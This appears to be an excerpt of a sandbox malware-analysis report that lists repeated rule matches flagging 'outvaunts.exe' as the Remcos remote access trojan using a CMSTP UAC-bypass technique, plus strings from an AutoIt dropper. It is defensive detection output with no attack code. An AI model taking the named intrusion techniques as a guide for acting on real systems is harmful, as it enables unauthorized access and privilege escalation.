Source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants, Author: unknown
Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants, Author: unknown
              Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: Process Memory Space: outvaunts.exe PID: 3860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3884, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3912, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3920, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3932, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3940, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3948, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3960, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3972, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3980, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3988, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 4036, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 4044, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 4052, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 4060, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 4072, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 4080, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 4088, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 2884, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3084, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3100, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3116, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3132, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3148, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3164, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: outvaunts.exe PID: 3176, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: This is a third-party compiled AutoIt script.5_2_00803B3A
              Source: kudo.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: kudo.exe, 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f8fd8a02-e
              Source: kudo.exe, 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_bfc4d300-0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: This is a third-party compiled AutoIt script.6_2_01363B3A
